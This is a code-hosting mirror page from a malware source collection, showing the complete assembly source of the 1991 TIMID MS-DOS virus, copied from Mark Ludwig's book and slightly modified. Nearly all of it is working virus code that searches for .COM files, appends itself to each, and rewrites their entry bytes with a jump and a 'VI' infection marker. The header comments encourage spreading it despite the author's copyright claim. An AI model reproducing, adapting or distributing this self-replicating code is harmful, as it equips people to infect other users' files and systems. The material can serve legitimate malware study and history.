ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-20 10:26:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4e191d7a54
MalwareSourceCode/MSDOS/T-Index/Virus.MSDOS.Unknown.timid.asm

196 lines
3.9 KiB
NASM
Raw Normal View History

re-organize push
2022-08-21 09:07:57 +00:00
;TIMID VIRUS asm by Mark Ludwig in 1991.
;
;-infects .coms only in current directory unless called by dos path statement
;-announces each file infected.
;297bytes=eff. length
;Copied from Mark Ludwig's "The Little Black Book of Computer Viruses"
;Slightly modified for A86 assembly.
;-asm makes a 64k file, run against 'bait' .com to get 297 byte virus
;-fixed bug in code reprinted in his book.
;all infected files will have VI at byte position 4-5.
;Mark Ludwig claims copyright on this virus and said he will
; sue anyone distributing his viruses around. I say have fun!.
main segment byte
assume cs:main, ds:main, ss:nothing
org 100h
host:
jmp near ptr virus_start
db 'VI' ;identifies virus
mov ah, 4ch
mov al, 0
int 21h
virus:
comfile db '*.com',0
virus_start:
call get_start
get_start:
sub word ptr [vir_start], offset get_start - offset virus
mov dx, offset dta
mov ah, 1ah
int 21h
call find_file
jnz exit_virus
call infect
mov dx, offset fname
mov [handle] b,24h
mov ah, 9
int 21h
exit_virus: ;bug was here in book
mov dx, 80h
mov ah, 1ah
int 21h
mov bx, [vir_start]
mov ax, word ptr [bx+(offset start_code)-(offset virus)]
mov word ptr [host], ax
mov ax, word ptr [bx+(offset start_code)-(offset virus)+2]
mov word ptr [host+2],ax
mov al, byte ptr [bx+(offset start_code)-(offset virus)+4]
mov byte ptr [host+4], al
mov [vir_start], 100h
ret
start_code:
nop
nop
nop
nop
nop
find_file:
mov dx, [vir_start]
add dx, offset comfile-offset virus
mov cx, 3fh
mov ah, 4eh
int 21h
ff_loop:
or al,al
jnz ff_done
call file_ok
jz ff_done
mov ah, 4fh
int 21h
jmp ff_loop
ff_done:
ret
file_ok:
mov dx, offset fname
mov ax, 3d02h
int 21h
jc fok_nzend
mov bx, ax
push bx
mov cx, 5
mov dx, offset start_image
mov ah, 3fh
int 21h
pop bx
mov ah, 3eh
int 21h
mov ax, word ptr [fsize]
add ax, offset endvirus - offset virus
jc fok_nzend
cmp byte ptr [start_image], 0e9h
jnz fok_zend
fok_nzend:
mov al, 1
or al,al
ret
fok_zend:
xor al,al
ret
infect:
mov dx, offset fname
mov ax, 3d02h
int 21h
mov word ptr [handle],ax
xor cx,cx
mov dx,cx
mov bx, word ptr [handle]
mov ax, 4202h
int 21h
mov cx, offset final -offset virus
mov dx, [vir_start]
mov bx, word ptr [handle]
mov ah, 40h
int 21h
xor cx,cx
mov dx, word ptr [fsize]
add dx, offset start_code-offset virus
mov bx, word ptr [handle]
mov ax, 4200h
int 21h
mov cx, 5
mov bx, word ptr [handle]
mov dx, offset start_image
mov ah, 40h
int 21h
xor cx,cx
mov dx,cx
mov bx, word ptr [handle]
mov ax, 4200h
int 21h
mov bx, [vir_start]
mov byte ptr [start_image], 0e9h
mov ax, word ptr [fsize]
add ax, offset virus_start-offset virus-3
mov word ptr [start_image+1], ax
mov word ptr [start_image+3], 4956h
mov cx, 5
mov dx, offset start_image
mov bx, word ptr [handle]
mov ah, 40h
int 21h
mov bx, word ptr [handle]
mov ah, 3eh
int 21h
ret
final:
;data area
endvirus equ $ + 212
org 0ff2ah
dta db 1ah dup (?)
fsize dw 0,0
fname db 13 dup (?)
handle dw 0
start_image db 0,0,0,0,0
vstack dw 50h dup (?)
vir_start dw (?)
main ends
end host
;end of timid.asm
Reference in New Issue Copy Permalink